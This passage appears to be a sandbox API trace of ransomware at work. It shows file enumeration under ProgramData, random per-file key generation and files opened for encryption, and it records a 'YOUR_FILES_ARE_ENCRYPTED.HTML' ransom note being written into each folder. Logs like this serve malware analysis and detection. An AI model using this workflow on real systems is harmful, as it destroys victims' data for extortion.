dwReserved1=0x60, cFileName="Manifest.xml", cAlternateFileName="")) returned 1 [0155.430] wnsprintfW (in: pszDest=0x7410060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml") returned 159 [0155.430] lstrcmpW (lpString1="Manifest.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.430] PathFindExtensionW (pszPath="Manifest.xml") returned=".xml" [0155.430] lstrlenW (lpString=".xml") returned 4 [0155.430] PathFindExtensionW (pszPath="Manifest.xml") returned=".xml" [0155.430] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0155.430] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\manifest.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a0 [0155.431] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=4903558) returned 1 [0155.431] GetProcessHeap () returned 0x270000 [0155.431] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x745b1e0 [0155.432] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="08") returned 2 [0155.432] wsprintfW (in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="D5") returned 2 [0155.432] wsprintfW (in: param_1=0x4ebce0e, param_2="%02X" | out: param_1="4B") returned 2 [0155.432] wsprintfW (in: param_1=0x4ebce12, param_2="%02X" | out: param_1="76") returned 2 [0155.432] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="EA") returned 2 [0155.432] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="F5") returned 2 [0155.432] wsprintfW (in: param_1=0x4ebce1e, param_2="%02X" | out: param_1="6A") returned 2 [0155.432] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="DF") returned 2 [0155.432] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="03") returned 2 [0155.432] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="02") returned 2 [0155.432] wsprintfW (in: param_1=0x4ebce2e, param_2="%02X" | out: param_1="F1") returned 2 [0155.432] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="E5") returned 2 [0155.432] wsprintfW (in: param_1=0x4ebce36, param_2="%02X" | out: param_1="0A") returned 2 [0155.432] wsprintfW (in: param_1=0x4ebce3a, param_2="%02X" | out: param_1="E3") returned 2 [0155.432] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="67") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="71") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="09") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce4a, param_2="%02X" | out: param_1="5D") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="6B") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="4F") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="12") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="8C") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: param_1="A5") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="64") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce66, param_2="%02X" | out: param_1="E0") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce6a, param_2="%02X" | out: param_1="90") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="45") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce72, param_2="%02X" | out: param_1="D6") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="35") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: param_1="9F") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="4E") returned 2 [0155.433] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="2C") returned 2 [0155.434] lstrcpyW (in: lpString1=0x746b294, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml" [0155.434] CreateIoCompletionPort (FileHandle=0x5a0, ExistingCompletionPort=0x3a0, CompletionKey=0x745b1e0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0155.434] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x745b1e0, lpOverlapped=0x745b1e0) returned 1 [0155.761] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3149d650, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3149d650, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x96c515d0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x266, dwReserved0=0x0, dwReserved1=0x60, cFileName="UserDeploymentConfiguration.xml", cAlternateFileName="USERDE~1.XML")) returned 1 [0155.761] wnsprintfW (in: pszDest=0x7410060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml") returned 178 [0155.761] lstrcmpW (lpString1="UserDeploymentConfiguration.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.761] PathFindExtensionW (pszPath="UserDeploymentConfiguration.xml") returned=".xml" [0155.761] lstrlenW (lpString=".xml") returned 4 [0155.761] PathFindExtensionW (pszPath="UserDeploymentConfiguration.xml") returned=".xml" [0155.761] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0155.762] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\userdeploymentconfiguration.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a0 [0155.762] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=614) returned 1 [0155.762] GetProcessHeap () returned 0x270000 [0155.762] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x745b1e0 [0155.763] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="88") returned 2 [0155.763] wsprintfW (in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="66") returned 2 [0155.763] wsprintfW (in: param_1=0x4ebce0e, param_2="%02X" | out: param_1="1B") returned 2 [0155.763] wsprintfW (in: param_1=0x4ebce12, param_2="%02X" | out: param_1="F3") returned 2 [0155.763] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="45") returned 2 [0155.763] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="C7") returned 2 [0155.763] wsprintfW (in: param_1=0x4ebce1e, param_2="%02X" | out: param_1="6E") returned 2 [0155.763] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="09") returned 2 [0155.763] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="AF") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="0B") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce2e, param_2="%02X" | out: param_1="34") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="C5") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce36, param_2="%02X" | out: param_1="F4") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce3a, param_2="%02X" | out: param_1="B2") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="4A") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="6C") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="67") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce4a, param_2="%02X" | out: param_1="18") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="2A") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="64") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="B9") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="D1") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: param_1="A7") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="F7") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce66, param_2="%02X" | out: param_1="B3") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce6a, param_2="%02X" | out: param_1="A0") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="B1") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce72, param_2="%02X" | out: param_1="E0") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="D5") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: param_1="D4") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="DF") returned 2 [0155.764] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="3F") returned 2 [0155.765] lstrcpyW (in: lpString1=0x746b294, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml" [0155.765] CreateIoCompletionPort (FileHandle=0x5a0, ExistingCompletionPort=0x3a0, CompletionKey=0x745b1e0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0155.765] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x745b1e0, lpOverlapped=0x745b1e0) returned 1 [0155.766] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xa1fe50b0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x2ef2ef, dwReserved0=0x0, dwReserved1=0x60, cFileName="UserManifest.xml", cAlternateFileName="USERMA~1.XML")) returned 1 [0155.766] wnsprintfW (in: pszDest=0x7410060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml") returned 163 [0155.767] lstrcmpW (lpString1="UserManifest.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.767] PathFindExtensionW (pszPath="UserManifest.xml") returned=".xml" [0155.767] lstrlenW (lpString=".xml") returned 4 [0155.768] PathFindExtensionW (pszPath="UserManifest.xml") returned=".xml" [0155.771] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0155.776] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\usermanifest.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a0 [0155.777] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=3076847) returned 1 [0155.777] GetProcessHeap () returned 0x270000 [0155.777] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x745b1e0 [0155.778] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="12") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="AE") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce0e, param_2="%02X" | out: param_1="B7") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce12, param_2="%02X" | out: param_1="37") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="F5") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="3D") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce1e, param_2="%02X" | out: param_1="F5") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="20") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="6D") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="67") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce2e, param_2="%02X" | out: param_1="A8") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="8F") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce36, param_2="%02X" | out: param_1="C3") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce3a, param_2="%02X" | out: param_1="1D") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="BB") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="80") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="F6") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce4a, param_2="%02X" | out: param_1="DF") returned 2 [0155.778] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="A3") returned 2 [0155.779] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="78") returned 2 [0155.779] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="03") returned 2 [0155.779] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="B6") returned 2 [0155.779] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: param_1="29") returned 2 [0155.779] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="D2") returned 2 [0155.779] wsprintfW (in: param_1=0x4ebce66, param_2="%02X" | out: param_1="CB") returned 2 [0155.779] wsprintfW (in: param_1=0x4ebce6a, param_2="%02X" | out: param_1="C6") returned 2 [0155.779] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="E1") returned 2 [0155.779] wsprintfW (in: param_1=0x4ebce72, param_2="%02X" | out: param_1="44") returned 2 [0155.779] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="02") returned 2 [0155.779] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: param_1="6E") returned 2 [0155.779] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="58") returned 2 [0155.779] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="6B") returned 2 [0155.779] lstrcpyW (in: lpString1=0x746b294, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserManifest.xml" [0155.780] CreateIoCompletionPort (FileHandle=0x5a0, ExistingCompletionPort=0x3a0, CompletionKey=0x745b1e0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0155.780] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x745b1e0, lpOverlapped=0x745b1e0) returned 1 [0155.782] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0xa1fe50b0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x2ef2ef, dwReserved0=0x0, dwReserved1=0x60, cFileName="UserManifest.xml", cAlternateFileName="USERMA~1.XML")) returned 0 [0155.874] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0155.874] wnsprintfW (in: pszDest=0x7410060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 176 [0155.874] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\{1a8308c7-90d1-4200-b16e-646f163a08e8}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x59c [0155.875] WriteFile (in: hFile=0x59c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0155.877] CloseHandle (hObject=0x59c) returned 1 [0155.877] GetProcessHeap () returned 0x270000 [0155.878] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7410060 | out: hHeap=0x270000) returned 1 [0155.878] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x97377710, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x97377710, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{1A8308C7-90D1-4200-B16E-646F163A08E8}", cAlternateFileName="{1A830~1")) returned 0 [0155.878] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0155.878] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 137 [0155.878] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0155.882] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0155.884] CloseHandle (hObject=0x598) returned 1 [0155.884] GetProcessHeap () returned 0x270000 [0155.885] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0155.885] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3030f410, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x3030f410, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{9AC08E99-230B-47E8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 0 [0155.885] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0155.885] wnsprintfW (in: pszDest=0x74481c0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0155.885] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x590 [0155.885] WriteFile (in: hFile=0x590, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0155.887] CloseHandle (hObject=0x590) returned 1 [0155.888] GetProcessHeap () returned 0x270000 [0155.888] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74481c0 | out: hHeap=0x270000) returned 1 [0155.893] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3030f410, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x3030f410, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x3030f410, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Packages", cAlternateFileName="")) returned 0 [0155.893] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0155.893] wnsprintfW (in: pszDest=0x74381b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0155.893] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\machinedata\\catalog\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0155.893] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0155.895] CloseHandle (hObject=0x594) returned 1 [0155.895] GetProcessHeap () returned 0x270000 [0155.896] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74381b8 | out: hHeap=0x270000) returned 1 [0155.898] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x312ae470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x312ae470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x312ae470, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="Integration", cAlternateFileName="INTEGR~1")) returned 1 [0155.898] wnsprintfW (in: pszDest=0x74281b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration") returned 63 [0155.898] GetProcessHeap () returned 0x270000 [0155.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7400058 [0155.899] lstrcpyW (in: lpString1=0x7400058, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration" | out: 